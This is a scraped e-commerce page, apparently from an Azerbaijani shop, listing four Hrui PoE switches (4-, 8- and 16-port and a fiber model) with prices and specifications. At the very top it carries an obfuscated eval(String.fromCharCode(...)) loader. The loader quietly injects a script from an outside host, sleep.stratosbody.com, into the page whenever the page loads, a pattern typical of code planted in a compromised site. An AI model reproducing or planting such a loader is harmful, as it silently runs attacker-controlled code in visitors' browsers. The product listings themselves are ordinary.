var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/

Showing all 4 results

Hrui Poe switch 16 port

Original price was: 540,00 ₼.Current price is: 250,00 ₼.
  • HR 901-AF-2421GS-300 (16CH 300W)
  • Məhsulun adı:27-Port10/100M PoE açarı
  • Model: HR901-AF-2421GS
  • Bağlayıcı Növü
  • 1)24*10/100M PoE Portu + 2*Gigabit Ethernet Uplink Portu + 1*Gigabit SFP Uplink Portu:
  • IEEE802.3
  • IEEE802.3u
  • Şəbəkə Protokolları:
  • *IEEE802.3x
  • *IEEE802.3ab
  • *IEEE802.3z
  • PoE Parametrləri:
  • PoE Standartı: IEEE802.3af /IEEE802.3a
  • Maksimum hər port: 15.4W (IEEE 802.3af)
  • Maksimum hər port: 30W (IEEE 802.3at)
  • PoE uyğunluğu: IEEE 802.3af/at adaptiv
  • PoE port çıxışı: DC48-55V
  • Power Pin:
  • *Ehtiyat cütlər üzərində güc 1/2(+) , 3/6 (-)
  • *10BASE-T: Cat 6 UTP(≤250 meter)
  • Network Media:
  • 1) 100BASE-TX: Cat5 və ya daha çox UTP (≤100 metr)
  • 2)1000BASE-TX: Cat5 və ya daha çox UTP (≤100 metr)
  • Optik:
  • 1)Çox Modlu Fiber: 850nm, 1310nm, ötürmə məsafəsi: 550m/2km
  • 2)Tək Modlu Fiber: 1310nm, 1550nm, Transmissiya Məsafəsi: 20/40/60/80/100/120km
  • Performans Xüsusiyyətləri Bant Genişliyi: 10.8Gbps
  • MAC: 2K
  • Packet Buffer Memory: 1M
  • Paket Yönləndirmə dərəcəsi: Mpps
  • Power input: AC100-240V 50/60Hz,
  • Enerji təchizatı: Çıxış: 52V5.76A
  • İş mühiti
  • 1)İş rütubəti: Maks 90%, kondensasiya olunmur
  • 2)Saxlama Rütubəti: Maks. 95%, kondensasiya olunmur
  • 3)Working Height: Max to 10,000 feet (3,000 meters).
  • 4)Saxlama hündürlüyü: Maksimum 10,000 fut (3,000 metr)

Hrui Poe switch 4 port

Original price was: 105,00 ₼.Current price is: 63,00 ₼.
  • 5 Ethernet portu;
  • PoE Fast Ethernet enerji təchizatı dəstəyi ilə
  • 4 port (10/100 Mbit/s);
  • 1 uplink Ethernet portu (10/100 Mbps);
  • Mühafizə standartları: CE, FCC, RoHS;
  • Maksimum PoE Gücü - hər port üçün 15,4 Vt və ya 30 Vt;
  • Standart olaraq PoE IEEE 802.3af / dəstəkləyir;
  • Gücləndirilən cihazın PoE sinifini və şəbəkəyə qoşulma sürətini avtomatik aşkarlayır;
  • Bağlı şəbəkə avadanlıqlarına kabel uzunluğu - 100 m -ə qədər;

Hrui Poe switch 4 port Fiber

Original price was: 190,00 ₼.Current price is: 113,00 ₼.
  •    Hrui Poe switch 4port "Fiber"
  •    HR 901 –AXG-411NS-120 (4CH Fiber)
  • 6 portlu Ethernet;
    4 porta podderjkoy РоЕ питания Gigabit Ethernet (10/100/1000 Мбит/с);
    1 Gigabit Ethernet portu (10/100/1000 Мбит/с);
    1 yuxarı bağlantı portu SFP Gigabit (10/100/1000 Мбит/с);
    Standart olaraq PoE IEEE 802.3af / dəstəkləyir;
    Maksimum PoE Gücü - hər port üçün 15,4 Vt və ya 30 Vt;
    Birləşdirilmiş şəbəkə avadanlığına kabel uzunluğu - 100 m-ə qədər;
    Yadda saxlanan MAC ünvanlarının sayı - 2000;
    Bant genişliyi - 12 Gbps;

Hrui Poe switch 8 port

Original price was: 155,00 ₼.Current price is: 89,00 ₼.
  • 10 Ethernet portu;
  • PoE power Megabit Ethernet (10/100 Mbit / s) dəstəyi ilə 8 port;
  • 2 uplink portu (10/100Mbps);
  • Maksimum PoE gücü - hər port üçün 15,4 və ya 30 Vt;
  • PoE ümumi büdcəsi: bütün portlar üçün 120W;
  • Standart olaraq PoE IEEE 802.3af / dəstəkləyir;
  • Gücləndirilən cihazın PoE sinifini və şəbəkə bağlantısının sürətini avtomatik olaraq aşkar edir;
  • Qoşulmuş şəbəkə avadanlığına kabelin uzunluğu ötürmə sürətindən və kabel növündən asılıdır:
  • 1)10BASE -T: Cat 3,4,5 UTP - 100 m -ə qədər.
  • 2)10BASE -T: Cat 6 UTP - 250 m -ə qədər
  • 3)100BASE-TX: Cat 5 və ya daha yaxşı - 100 m-ə qədər